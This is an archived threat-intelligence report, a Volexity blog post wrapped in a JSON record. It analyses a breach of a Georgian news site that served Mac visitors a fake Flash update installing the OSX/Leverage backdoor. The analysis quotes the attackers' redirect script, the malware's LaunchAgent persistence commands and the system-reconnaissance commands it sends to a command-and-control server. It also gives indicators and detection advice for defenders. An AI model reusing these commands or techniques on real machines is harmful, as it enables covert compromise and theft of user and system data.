{
	"id": "29f716cf-9077-4b47-8074-2084f7c3fb55",
	"created_at": "2026-04-06T00:19:15.969459Z",
	"updated_at": "2026-04-10T03:21:47.612066Z",
	"deleted_at": null,
	"sha1_hash": "55dcf6af3329f726ccca2d46c81ab9142464cdc5",
	"title": "Real News, Fake Flash: Mac OS X Users Targeted",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 527936,
	"plain_text": "Real News, Fake Flash: Mac OS X Users Targeted\r\nBy mindgrub\r\nPublished: 2017-07-24 · Archived: 2026-04-05 18:35:00 UTC\r\nVolexity recently identified a breach to the website of a well regarded media outlet in the country of Georgia. As\r\npart of this breach, the media organization’s website was being leveraged as a component of a malware campaign\r\ntargeting select visitors. The news organization provides reporting on its website in English, Georgian, and\r\nRussian. However, only the Georgian language portion of the website was impacted and used in an effort to\r\ndistribute malware. The targets were then further narrowed to those that were running the Mac OS X operating\r\nsystem, had not previously visited the website, and had specific browser versions. The attackers accomplished\r\nmuch of this with JavaScript they placed on the media organization’s website.\r\nThe following JavaScript code was observed on the index page of the Georgian language portion of the website.\r\nThe attackers appear to have implemented multiple checks to make sure they limited the targeting and frequency\r\nof the attacks against visitors to the website. In particular, the JavaScript specifically checks if the vistor’s User-Agent is associated with a Mac and that the browser is not Google Chrome. If these conditions pass, cookies for\r\nthe website are pulled into a variable and inspected. In particular a cookie named site is examined to see if it holds\r\nthe value RNDsstr2Template2 or RNDsstrTemplate. If either cookie is present, it indicates that the visitor has\r\npreviously visited the website and evaluated the attacker’s JavaScript code. If this is the case, the exploitation\r\nchain will end. The code will then extend the expiration of the site cookie with  RNDsstr2Template2 as its value.\r\nHowever, if initial criteria passed and the site cookie is not present or at least does not contain the value\r\nRNDsstr2Template2 or RNDsstrTemplate, the JavaScript will then create the site cookie with the value\r\nRNDsstrTemplate and then call the function prepareFrame().\r\nhttps://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/\r\nPage 1 of 7\n\nThe prepareFrame() function effectively loads an iframe from the following attacker controlled URL:\r\nhttp://updatesec.webredirect[.]org/flash/index.php\r\nDuring most of Volexity’s test cases, this page will only return 2 bytes back to the request. However, when\r\nrequesting the URL with a User-Agent indicative of a Mac system using Safari, Volexity was able to intermittently\r\nget the the website to return follow on JavaScript. Despite the initial check ensuring the visitor is on a Mac and\r\nnot running Google Chrome, it appears server-side code performs further checks before attempting to actually\r\ntarget the user. Volexity observed the following code being returned from the server upon meeting all targeting\r\nconditions:\r\n\u003cscript type=’text/javascript’\u003e\r\nwindow.parent.location.href= ‘http://updatesec.webredirect[.]org/flashplayer/index.html’;\r\n\u003c/script\u003e\r\nThis script results in the user being brought to a page titled “Flash Player Critical Update” that was designed to\r\nappear as though it was a legitimate Adobe website. This page in turn loaded an iframe from the following URL:\r\nhttp://updatesec.webredirect[.]org/flash.html\r\nThe code from this URL appears to have been generated from Metasploit with a module for the Safari User-Assisted Download and Run Attack. The Metasploit website describes the attack and the module as follows:\r\nThis module abuses some Safari functionality to force the download of a zipped .app OSX application\r\ncontaining our payload. The app is then invoked using a custom URL scheme. At this point, the user is\r\npresented with Gatekeeper’s prompt: “APP_NAME” is an application downloaded from the internet.\r\nAre you sure you want to open it? If the user clicks “Open”, the app and its payload are executed. If the\r\nuser has the “Only allow applications downloaded from Mac App Store and identified developers (on\r\nby default on OS 10.8+), the user will see an error dialog containing “can’t be opened because it is from\r\nan unidentified developer.” To work around this issue, you will need to manually build and sign an OSX\r\napp containing your payload with a custom URL handler called “openurl”. You can put newlines and\r\nunicode in your APP_NAME, although you must be careful not to create a prompt that is too tall, or the\r\nuser will not be able to click the buttons, and will have to either logout or kill the CoreServicesUIAgent\r\nprocess.\r\nThe code in this case would attempt to download and install malware from the following URL:\r\nhttp://updatesec.webredirect[.]org/GetFlashPlayer.zip\r\nThe User-Assisted Download and Run would then result in the creation of the file (directory)\r\nGetFlashPlayer.app and its attempted launch from the user’s Downloads directory. Per the description above, OS\r\nX will then prompt the user if they are sure they wish to run the file since it was downloaded from the Internet.\r\nhttps://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/\r\nPage 2 of 7\n\nIf the user selects “Open” or otherwise later launches it from their Download folder, the malware will be launched\r\nand install a copy of itself at the following path:\r\n/Users/\u003cusername\u003e/Library/Safari/GetFlashPlayer.app/\r\nThe folder structure of the malware and its files is shown below.\r\nThe malware maintains persistence through a Launch Agent by executing the following commands:\r\nhttps://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/\r\nPage 3 of 7\n\nmkdir ~/Library/LaunchAgents\necho ‘?xml version=”1.0″ encoding=”UTF-8″?\u003eRunAtLoadKeepAliveLabelcom.GetFlashPlayerProgramArguments/Users//Library/Safari/GetFlashPlayer.app/Contents/MacOS/GetFlashPlayer’ \u003e ~/Library/LaunchAgents/com.GetFlashPlayer.plist\nAs can be seen, the malware is writing a plist file named com.GetFlashPlayer.plist into the victim user’s\nLaunchAgent directory.\nThe RunAtLoad and KeepAlive keys ensure that the malware will gain persistence and keep running.\nUpon execution, the malware will also use the open command to launch the URL\nhttps://get.adobe.com/flashplayer/ in a browser window. This new browser activity is meant to trick the user into\nthinking the Adobe Flash Update application is legitimate. The malware then immediately begins to beacon to\ndownloadarchives.servehttp[.]com (213.200.14.138) on TCP port 7777. If a successful connection is made, the\noutput from the following commands is sent:\n1. logname\n2. ioreg -l | grep “product-name” | awk -F\\” ‘{print $4}’\n3. sw_vers | awk -F\\’:t’ ‘{print $2}’ | paste -d ‘ ‘ – – -;\n4. sysctl -n hw.memsize | awk ‘{print $0/1073741824″ GB RAM”}’;\n5. df -hl | grep ‘disk0s2’ | awk ‘{print $4″/”$2″ free (“$5″ used)”}’\n6. ioreg -l | grep “IOPlatformSerialNumber” | awk -F” ‘{print $4}’\nThe information gathered by these commands includes the following:\nCommand Information Gathered\n1 The account name of the logged in user\n2\nThe name and version of the hardware (or virtual machine) running the malware. For example,\n“MacBookAir6,2” or “VmWare9,1”.\n3 The installed version of OS X\n4 The amount, in gigabytes, of RAM installed\n5 The amount of disk spaced available and used\n6 The system’s serial number (unique to the hardware or virtual machine)\nThe backdoor is very noisy and will attempt to communicate with the command and control server every second\nuntil a connection is established.\nMalware File Information\nhttps://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/\nPage 4 of 7\n\nThe malware used by the attackers appears to be a newer version of what has previously been dubbed\r\nOSX/Leverage.A and described in public blogs by Intego and AlienVault. It is written in Real Basic and beacons\r\nback to the attackers once per second until a connection is established. Unlike the earlier version of the malware,\r\nthis new version does not limit itself to a predefined set of commands and instead allows an unrestricted command\r\nshell capability back into an infected system. Details of the core malware files are provided below.\r\nFile Hashes\r\nFilename: GetFlashPlayer.zip\r\nFile size: 1378073 bytes\r\nMD5 hash: 6597ffd7d1d241b1bf776bc7e1e3f840\r\nSHA1 hash: 2810d554b2e9e14551cef7293e5240b058fb78c3\r\nNotes: ZIP file containing the OSX/Leverage.A GetFlashPlayer.app application/directory.\r\nFilename: GetFlashPlayer\r\nFile size: 2131776 bytes\r\nMD5 hash: 28064805242b3aa9c138061d6c18e7f5\r\nSHA1 hash: 2441e2e9f68b4110218e1fcdc2cfce864b96e2da\r\nNotes: Signed OSX/Leverage.A binary masquerading as a legitimate file from Adobe\r\nDigitally Signed\r\nThis instance of the OSX/Leverage backdoor had been signed with a code signing certificate that was issued to an\r\nApple Developer. Additional notes of interest related to the compilation time of the malware and developer name\r\nassociated with the codesigning certificate are shown below from the codesign utility:\r\n$ codesign -dvv GetFlashPlayer.app/\r\nExecutable=/Users/volexity/malware/GetFlashPlayer.app/Contents/MacOS/GetFlashPlayer\r\nIdentifier=com.papandopulo.alex\r\nFormat=app bundle with Mach-O thin (i386)\r\nCodeDirectory v=20200 size=10464 flags=0x0(none) hashes=516+3 location=embedded\r\nSignature size=8532\r\nAuthority=Developer ID Application: aleks papandopulo (SN6EU36WE9)\r\nAuthority=Developer ID Certification Authority\r\nAuthority=Apple Root CA\r\nTimestamp=Feb 5, 2016, 06:25:25\r\nInfo.plist entries=16\r\nhttps://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/\r\nPage 5 of 7\n\nTeamIdentifier=SN6EU36WE9\r\nSealed Resources version=2 rules=12 files=4\r\nInternal requirements count=1 size=180\r\nDetection\r\nDetection of the malware can be achieved both from the host and network level. On the host, systems can be\r\nexamined for the presence of the GetFlashPlayer application and/or Launch Agency under a user’s profile.\r\nAdditionally, any files found to be signed with the certificate described above should be considered to be\r\nmalicious. At the network level, connections destined for TCP port 7777 should be scrutinized and examined, as\r\nthis is a non-standard port for typical external communication. The following Emerging Threats rule, found under\r\ntrojan.rules, will also detect the network beacons:\r\n2017525 – ET TROJAN OSX/Leverage.A Checkin\r\nNetwork Indicators\r\nDNS Names\r\nHostname IP Address\r\nupdatesec.webredirect[.]org 45.77.53.146\r\ndownloadarchives.servehttp[.]com 213.200.14.138\r\nIP Addresses\r\nVolexity was also able to find ties between the updatesec.webredirect[.]org exploitation and malware delivery\r\nserver and the IP address 176.9.192.223. Volexity believes this IP is likely used for similar purposes and is directly\r\nrelated with the threat activity described in this blog.\r\nIP Address ASN Information\r\n45.77.53.146 20473 | 45.77.52.0/22 | AS-CHOOPA | US | Choopa, LLC, US\r\n213.200.14.138 16010 | 213.200.0.0/19 | MAGTICOMAS, | GE | GE\r\n176.9.192.223 24940 | 176.9.0.0/16 | HETZNER | DE | AS, DE\r\n[Un]Related Activity\r\nIn a final interesting twist, while writing this blog, Volexity noted that the IP address for the hostname\r\nupdatesec.webredirect[.]org was updated to resolve to the Lithuanian IP address 185.28.22.22. This IP address\r\ndoes not appear to be responding on port 80, so no content would be served to visitors. However, it should be\r\nhttps://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/\r\nPage 6 of 7\n\nnoted that this IP address is listed as a command and control server in the Stantinko report that was just released\r\nby ESET last week. Volexity is not aware of any ties between this threat activity and those behind Stantinko.\r\nSource: https://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/\r\nhttps://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/\r\nPage 7 of 7\n\n  https://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/    \nnoted that this IP address is listed as a command and control server in the Stantinko report that was just released\nby ESET last week. Volexity is not aware of any ties between this threat activity and those behind Stantinko.\nSource: https://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/      \n   Page 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/"
	],
	"report_names": [
		"real-news-fake-flash-mac-os-x-users-targeted"
	],
	"threat_actors": [],
	"ts_created_at": 1775434755,
	"ts_updated_at": 1775791307,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/55dcf6af3329f726ccca2d46c81ab9142464cdc5.pdf",
		"text": "https://archive.orkl.eu/55dcf6af3329f726ccca2d46c81ab9142464cdc5.txt",
		"img": "https://archive.orkl.eu/55dcf6af3329f726ccca2d46c81ab9142464cdc5.jpg"
	}
}